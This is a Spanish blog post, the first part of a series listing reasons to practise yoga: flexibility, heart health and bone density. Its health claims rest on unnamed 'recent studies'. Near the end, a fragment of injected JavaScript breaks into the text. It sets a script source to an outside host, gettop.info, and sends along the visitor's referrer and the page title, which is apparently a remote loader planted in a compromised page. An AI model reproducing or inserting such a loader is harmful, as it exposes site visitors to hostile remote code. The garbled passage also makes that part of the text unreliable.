Salud y belleza » Deportes

Yoga, ¿por qué practicarlo? (I)

1 Comentario

“¿Por qué?”. El ejercicio de la pregunta representa una sana costumbre. Casi tan sana como la práctica de yoga. El hombre, cual filosofo, debiera siempre buscar razones, argumentos al momento de motorizar cualquier actividad. En el caso del yoga, se pueden nombrar no menos de veinte, treinta, cincuenta justificaciones para su práctica.

Comencemos, entonces, el repaso en torno, precisamente, a los argumentos más pertinentes para valorar el Yoga.

Incremento de la flexibilidad

Tal vez se trate del beneficio más popular (o estereotipado). De a poco, siguiendo las normas y respetando los niveles de cada postura, se podrán evidenciar grandes cambios en ese aspecto.

Mejoramiento de la salud cardiovascular.

Recientes estudios han demostrado que hacer yoga ralentiza el ritmo cardíaco. Además aumenta el aguante muscular y la saturación máxima de oxígeno.

Fortalecimiento de huesos

Como en el caso anterior, el yoga también aumenta la densidad ósea en vértebras. Disminuye, también, los niveles de las hormonas del estrés: por lo tanto, la fijación de calcio se ve potenciada.

¡No te pierdas la próxima entrega con más razones para practicar yoga y como hacer el yoga!}s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '';

Más consejos de salud y belleza : ,

One Comment »

  • El mundl del Yoga (II) said:

    [...] menudo, con una sola razón no basta. El hombre necesita más argumentos. Muchos. Y, si bien en general es difícil conseguir tantas [...]

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.